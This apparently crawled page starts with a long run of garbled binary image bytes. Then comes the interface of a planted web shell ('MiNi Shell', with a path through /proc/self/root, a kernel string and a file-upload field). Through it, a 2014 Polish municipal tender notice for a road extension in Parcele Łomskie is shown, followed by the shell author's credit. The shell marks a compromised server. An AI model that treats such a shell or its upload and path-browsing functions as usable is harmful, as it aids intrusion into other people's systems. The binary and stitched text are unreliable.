JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140515/104893-N-2014.html

<p class="kh_header"><b>Lipowiec Kościelny: Rozbudowa drogi gminnej nr 230219W w miejscowości Parcele Łomskie</b><br>
<b>Numer ogłoszenia: 104893 - 2014; data zamieszczenia: 15.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lipowiec Kościelny , Lipowiec Kościelny 213, 06-545 Lipowiec Kościelny, woj. mazowieckie, tel. 023 6555028 lub 29, faks 023 6555028.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa drogi gminnej nr 230219W w miejscowości Parcele Łomskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Branża drogowa:
1. Roboty w zakresie burzenia i rozbiórki obiektów budowlanych - roboty przygotowawcze: 
  1) Roboty pomiarowe przy wyznaczeniu trasy drogi, punktów głównych trasy i punktów 
      wysokościowych w terenie wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej;
  2) Mechaniczne zdjęcie warstwy ziemi urodzajnej (humusu) gr. 15 cm ze złożem na hałdę;
  3) Roboty ziemne wykonane ładowarkami kołowymi o poj. Łyżki 1,25 m3 z transportem urobku  
      samochodami samowyładowczymi 10-15t na odl. do 5km. Grunt kat. III Załadunek humusu
  4) Mechaniczne ścinanie drzew i karczowanie pni przy średnicy drzew 66-75cm wraz z  
      zagospodarowaniem karpiny, dłużnicy i drągowiny przez Wykonawcę robót i odwozem na odkład 
      na odległość do 10 km
  5) Wykonanie regulacji wysokościowej zaworów wodociągowych lub gazowych
2. Roboty w zakresie przygotowania terenu pod budowę roboty ziemne:
  1) Mechaniczne wykonanie robót ziemnych koparkami podsiębiernymi o pojemności naczynia 
      roboczego 0,40m3 z załadunkiem na środki transportu kołowego i przewiezieniem na odkład na 
      odległość do 5km. Grunt kat. III
  2) Formowanie nasypów z gruntu dostarczonego do miejsca wbudowania z wykopów. Grunt kat. III
  3) Zagęszczanie nasypów walcami samojezdnymi wibracjami 7,5 t. Grunt spoisty kategorii III
3. Odwodnienie korpusu drogowego:
  1) Mechaniczne wykonanie robót ziemnych koparkami podsiębiernymi o pojemności naczynia 
      roboczego 0,40m3 ze złożem urobku obok wykopu Roboty związane z wykopami pod przepust
  2) Wykonanie ławy żwirowej pod przepusty rurowe w gotowym wykopie przy grubości warstwy 
      30cm po zagęszczeniu
  3) Wykonanie części przelotowej przepustów rurowych z rur z tworzywa sztucznego typu PVC o 
      średnicy 400 mm na gotowym wykopie z zastosowaniem pospółki
  4) Wykonanie ścianek z czołowych przepustów rurowych z betonu klasy C20/25 szt. dla rur o 
       średnicy o 40
  5) Zasypanie wykopów gruntem  niewysadzeniowym przekopów po przepustach wraz z zakupem i 
      dowozem gruntu
  6) Mechaniczne oczyszczenie istniejącego rowu przydrożnego na wlocie i wylocie przepustu z 
      załadunkiem gruntu na samochody samowyładowcze i dowozem na odkład na odległość do 5m.
4. Fundamentowanie dróg:
  1) Mechaniczne profilowanie i zagęszczanie istniejącego podłoża równiarką oraz walcem 
      wibracyjnym lub ogumionym
  2) Wykonanie podbudowy z kruszywa naturalnego (mieszanka żwiru, piasku i pospółki) 
     stabilizowanego mechanicznie przy grubości warstwy po zagęszczeniu 20cm
  3) Wykonanie warstwy mrozoochronnej z piasku (kruszywa naturalnego) przy grubości warstwy 
      pozagęszczaniu 15cm na odcinku dochodzącym do drogi wojewódzkiej
  4) Wykonanie podbudowy pomocniczej z kruszywa łamanego o uziarnieniu 0/31 mm stabilizowanego 
      mechanicznie przy grubości warstwy po zagęszczeniu 20 cm na odcinku dochodzącym do drogi 
      wojewódzkiej
   5) Skropienie nawierzchni bitumicznej emulsją asfaltową w ilości 0,15/0,20 kg/m2 przed ułożeniem 
       warstwy ścieralnej nawierzchni 
   6) Wykonanie podbudowy zasadniczej z betonu asfaltowego o uziarnieniu 0/20mm przy grubości  
       warstwy po zagęszczeniu 7 cm na odcinku dochodzącym do drogi wojewódzkiej
   7) Mechaniczne uzupełnienie poboczy kruszywem naturalnym stabilizowanym mechanicznie przy  
       grubości warstwy po zagęszczeniu 12cm
5. Roboty w zakresie nawierzchni dróg:
   1) Wykonanie warstwy wiążącej nawierzchni z betonu asfaltowego AC 16W 50/70 przy grubości 
       warstwy po zagęszczeniu 4cm;
   2) Wykonanie warstwy ścieralnej nawierzchni z betonu asfaltowego AC 11S 50/70 przy grubości 
       warstwy po zagęszczeniu 5 cm;
   3) Wykonanie warstwy ścieralnej nawierzchni z betonu asfaltowego AC 11S 50/70 przy grubości 
       warstwy po zagęszczeniu 4 cm.
6. Oznakowanie dróg i urządzenia bezpieczeństwa ruchu:
   1) Wykonanie oznakowania poziomego mechanicznie Linie typu P-1e, P-4, P-13
   2) Ustawienie słupków stalowych z ruro średnicy 70 mm do znaków drogowych
   3) Ustawienie pionowe znaków drogowych odblaskowych na słupkach z rur stalowych 
       a. Znaki typu A
Branża elektryczna:
I. Demontaż linii napowietrznej nn- 0,4 kV
1) Montaż przewodów izolowanych AsXSn 2x25 mm2 - ANALOGIA demontaż 
2) Demontaż słupa żelbetonowego linii NN pojedynczego z ustojami 
3) Demontaż oprawy oświetlenia zewnętrznego zainstalowanej na trzpieniu słupa lub wysięgniku 
II. Budowa linii napowietrznej nn-0,4 kV
1) Montaż i stawianie słupów linii napowietrznej nn z żerdzi wirowanych EPV 10,5/6 - z demontażu 
2) Montaż przewodów izolowanych AsXSn 2x25 mm2 - z demontażu 
3) Montaż opraw OUSe- 70W oświetlenia zewnętrznego na wysięgnikach z demontażu
4) Montaż ograniczników przepięć w liniach napowietrznych nn z przewodów izolowanych z demontażu 
5) Uziomu powierzchniowej prętowe z instalacji odgromowej. Montaż uziomów poziomych w wykopie o głębokości do 0,80 m w gruncie kategorii IV
6) Uziomy o długości 3 m ze stali profilowanej miedziowane (metoda wykonania udarowa) z zastosowaniem agregatu prądotwórczego. Kategoria gruntu III
7) Uziomy za każde następne 1,5 m długości ze stali profilowanej miedziowane z zastosowaniem agregatu prądotwórczego. Kat. Gruntu III
8) Badania i pomiary instalacji uziemiającej. Uziemienie ochronne lub robocze, pomiar pierwszy 
9) Badania i pomiary instalacji uziemiającej. Uziemienie ochronne lub robocze za każdy dostępny pomiar 
10) Tyczenie i inwentaryzacja powykonawcza linii kablowej oświetlenia ulicznego - Kalkulacja własna. 

Branża sanitarna: 
1) Ręczne wykopy ciągłe lub jamiste ze skarpami o szer. dna do 1,5 m i głębok. do 1,5m ze złożeniem urobku na odkład (kat.gr.I-II)
2) Zagęszczenie nasypów ubijakami mechanicznymi, grunty sypkie kat. I-III 
3) Zasypywanie wykopów o ścianach pionowych o szerokości 0.8-2.5 m i głęb. do 1.5m w gr. kat. 
    III-IV
4) Montaż rurociągów z rur polietylenowych (HDPD) o śr. nominalnej 90 mm z rur w zwojach 
5) Połączenie rur z polietylenu o śr 90 mm za pomocą kształtek elektrooporowych 
6) Połączenie z rur z polietylenu o śr 90 mm za pomocą kształtek elektrooporowych 
7) Połączenie z rur z polietylenu o śr. 90 mm za pomocą kształtek elektrooporowych 
8) Połączenie z rur z polietylenu o śr. 90 mm za pomocą kształtek elektrooporowych 
9) Montaż rurociągów z rur polietylowych (HDPD) o śr. Nominalnej 25 mm z rur w zwojach 
10) Połączenia rur z polietylenu o śr 32 mm za pomocą kształtek elektrooporowych 
11) Rury ochronne (osłonowe) z PE, o śr. nom 63 mm i 125 mm
12) Rury ochronne (osłonowe) z PE o śr. nom 90 mm(AROT)
13) Sączki węchowe punktowe z PE o 32
14) Oznakowanie trasy gazociągu ułożonego w ziemi taśmą z tworzywa sztucznego
15) Oznakowanie trasy gazociągu ułożonego w ziemi taśmą z tworzywa sztucznego 
16) Oznakowanie trasy gazociągu na murze
17) Próba szczelności i wytrzymałości gazowych przyłączy domowych - aparatury kontrolno- pomiarowej
18) Próba szczelności gazociągów o śr. nom. 90 mm na ciśnienie do 0,75 MPa
19) Inwentaryzacja powykonawcza przyłącza
20) Zajęcie pasa drogowego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.14.00-9, 45.23.13.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 3 000,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach załączonych do oferty zgodnie z formułą spełnia  nie spełnia.
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia zobowiązani są do ustanowienia Pełnomocnika celem reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia, w szczególności 
        wykonali w okresie 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , 
        jedną robotę budowlaną o wartości co najmniej 100.000.00 zł. odpowiadającą swoim rodzajem 
        robotom budowlanym stanowiącym przedmiot zamówienia.
        Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w 
        powyższym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu 
        w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia , w 
       szczególności dysponują  co najmniej jedną osobą przewidzianą do realizacji zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadającą wymagane przepisami Prawa Budowlanego uprawnienia
       do kierowania robotami budowlanymi w specjalności drogowej. - wpisane na listę 
       Okręgowej Izby Inżynierów Budownictwa.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego        
        zamówienia, w szczególności posiadają środki finansowe lub zdolność kredytową Zamawiający   
        odstępuje od opisu sposobu dokonywania oceny spełniania warunków w powyższym zakresie.  
        Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na  
        podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dowód wniesienia wadium 
2. Referencje</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lipowieckoscielny.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Lipowiec Kościelny 213, 06-545 Lipowiec Kościelny, pok. nr 18..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2014 godzina 10:00, miejsce: Sekretariat Urzędu Gminy w Lipowcu Kościelnym.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com